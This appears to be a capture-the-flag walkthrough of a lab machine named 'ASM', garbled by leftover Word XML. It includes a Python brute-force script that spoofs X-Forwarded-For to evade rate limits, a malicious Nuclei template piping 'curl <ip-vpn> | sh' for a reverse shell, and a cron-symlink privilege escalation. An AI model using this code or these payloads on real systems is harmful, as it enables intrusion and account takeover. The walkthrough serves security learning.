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4okx3w7jn6mh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ASM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o68jrk2r7n34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Nmap Scan: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80 of the web service, a login page is presented that requires a previously registered email address in the application in order to proceed.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6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some SQL Injection exploitation attempts without success, the next step is to perform fuzzing.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performing basic fuzzing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common.txt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wordlist, we identified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assets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 However, when attempting to access it, we received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403 Forbidden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status code, indicating restricted access.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0" l="0" r="0" t="0"/>
            <wp:docPr id="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possible vulnerability we can test here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Off-by-Slash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occurs due to an improper configuration in Nginx. When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alias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directive is incorrectly configured, it is possible to access files stored outside the intended directory, allowing unauthorized file reading.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https://blog.detectify.com/industry-insights/common-nginx-misconfigurations-that-leave-your-web-server-ope-to-attack/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perform fuzzing again, this time exploiting the Off-by-Slash vulnerability. This allows us to attempt accessing directories outside the permitted scope by taking advantage of a potential misconfiguration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Nginx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alias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5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fuzzing, we identified an exposed Git repository. With this, we can use the tool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git_dumper.py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dump the repository files.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https://github.com/carlosevieira/git-dumper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7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completing the dump, we can access the directory where the files were extracted and execute the command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git log.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provides us with an email address, which can be used to proceed.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email address in hand, we can return to the login page and use it. After providing the email, we are redirected to a page requesting a code, which was supposedly sent to the provided email address.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we do not know the expected code, we can perform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code review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source code obtained during the repository dump. For this, we use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VSCode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facilitates code reading and understanding, improving readability and helping identify the logic behind code generation or validation.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6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analyzing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controllers/api/auth.js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(lines 22 to 48)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verified that when a valid email is provided, the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generateAccessCode()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called. This function, defined between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lines 12 and 19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generates a random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4-digit number (0000–9999)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converts it to a string, and then calculates its MD5 hash. The generated value is then stored in the database.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this, we can attempt validation by submitting 4-digit integer codes and intercepting the request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7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shown in the image above, the 4 digits provided are transformed into an MD5 hash value. This process is performed through a JavaScript script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public/js/send-code.js.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information, we can develop a brute-force attack script. However, there is an obstacle: the application implements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can be confirmed by analyzing the response headers, where the value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X-RateLimit-Remaining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decreases with each request, with a maximum limit of 100 requests.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configuration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app.set('trust proxy', true)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indicates that Express should trust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X-Forwarded-For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header, allowing the application to consider the real client IP, even if the request passed through proxies or load balancers.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Regarding rate limiting, we can bypass this restriction by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X-Forwarded-For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header to assign a random IP address to each request, without exceeding the 100-request limit per IP. By alternating the IP address on each request, we prevent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X-RateLimit-Remaining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counter from reaching zero, allowing continuous brute-force attempts.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use the following script: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import requests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import hashlib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import random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import threading</w:t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found = False</w:t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def generate_md5_code(number):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formatted_number = f"{number:04d}"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md5_hash = hashlib.md5(formatted_number.encode()).hexdigest()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return formatted_number, md5_hash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def generate_realistic_ip():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return f"{random.randint(1, 254)}.{random.randint(0, 255)}.{random.randint(0, 255)}.{random.randint(1, 254)}"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def make_request(number):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global found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if found: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url = "http://&lt;ip-machine&gt;/api/auth/access/validate"  # Change this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headers = {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"temp-token": "TOKEN_HERE"  # Change this</w:t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original_code, md5_code = generate_md5_code(number)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random_ip = generate_realistic_ip()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headers["X-Forwarded-For"] = random_ip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payload = {"access_code": md5_code}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sys.stdout.write(f"\rTesting code: {original_code}")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sys.stdout.flush()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response = requests.post(url, headers=headers, json=payload)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    found = True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    print(f"\nSuccess! Code: {original_code}")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print(f"\nError during request: {e}")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def thread_worker(start, end):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for number in range(start, end):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if found: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make_request(number)</w:t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total_requests = 10000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threads_count = 10</w:t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requests_per_thread = total_requests // threads_count</w:t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threads = []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for i in range(threads_count):</w:t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start = i * requests_per_thread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end = start + requests_per_thread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thread = threading.Thread(target=thread_worker, args=(start, end))</w:t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threads.append(thread)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thread.start()</w:t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for thread in threads:</w:t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thread.join()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if not found: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print("\nNo valid code was found.")</w:t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6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the correct code, we can return to the login page. Upon submitting it, we gain access to the application dashboard.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7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Vulnerability Scan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observe that it is possible to provide a URL and a Nuclei template, which triggers execution of a scan against the specified URL.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16300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="7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running a simple template and clicking “Scan Now,” some errors are returned. However, from these errors, we can identify that the Nuclei version in use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3.2.9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7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56000"/>
            <wp:effectExtent b="0" l="0" r="0" t="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researching vulnerabilities in Nuclei version 3.2.9, we found a proof of concept (PoC) in the Nuclei GitHub repository under the security advisories tab. This PoC demonstrates how to create a malicious template that enables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Code Execution (RCE)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3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https://github.com/projectdiscovery/nuclei/security/advisories/GHSA-c3q9-c27p-cw9h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5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providing the malicious template and clicking “Scan Now,” we observe that the output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is returned, confirming that Nuclei v3.2.9 is vulnerable to RCE.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0" l="0" r="0" t="0"/>
            <wp:docPr id="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Knowing this, we can replace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with a reverse shell:</w:t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id: code</w:t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info:</w:t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name: example code template</w:t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author: ovi3</w:t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- engine:</w:t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- sh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- bash</w:t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source: |</w:t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curl &lt;ip-vpn&gt; | sh</w:t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http:</w:t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- raw:</w:t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- |</w:t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POST /re HTTP/1.1</w:t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Host: {{Hostname}}</w:t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{{code_response}}</w:t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workflows:</w:t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- matchers:</w:t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- name: t</w:t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6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5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the reverse shell, we access the home directory of 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asm_user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retrieve the first flag.</w:t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46200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="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we find the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make_backup.sh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This script performs two main actions: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Removes old backup files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/var/backups/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that start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asm_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have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extension.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Creates a new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archive containing the contents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/home/asm_user/asm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stores it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/var/backups/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 important observation is that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cron job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configured to execute this script every 1 minute, as shown in the image and confirmed by reviewing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/etc/crontab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script compresses the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located in our home folder, we can exploit this by creating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symbolic link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pointing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/root/root.txt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the script compresses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it will include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via the symbolic link, allowing access to the root flag.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6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the steps above, we wait 1 minute for the cron job to execute. Then, we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/var/backups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directory, move the compressed file to a writable directory, and finally extract it to obtain the final flag.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headerReference r:id="rId45" w:type="even"/>
      <w:footerReference r:id="rId46" w:type="default"/>
      <w:footerReference r:id="rId47" w:type="first"/>
      <w:footerReference r:id="rId48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>
        <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
      </w:rPr>
    </w:pPr>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.175f5cs94z0o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9" name="image35.jpg"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image35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3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ASM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22.png"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header2.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.png"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image29.png"/><Relationship Id="rId45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32.png"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image33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8.png"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/projectdiscovery/nuclei/security/advisories/GHSA-c3q9-c27p-cw9h" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image34.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.detectify.com/industry-insights/common-nginx-misconfigurations-that-leave-your-web-server-ope-to-attack/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30.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/carlosevieira/git-dumper" TargetMode="External"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.png"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13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jpg"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2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3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WRUlsfjZrH+TaUTmYtC0Oys7A==">CgMxLjAyDmgubWQ1eDI5eGxxOGRpMg5oLjZnanl5Znd5aXUwMjIOaC40b2t4M3c3am42bWgyDmgubzY4anJrMnI3bjM0Mg5oLjE3NWY1Y3M5NHowbzgAciExb2lKV19GNTRVSUNTZHFfam5jR1RPVnRRd1Z3UTRjZkw=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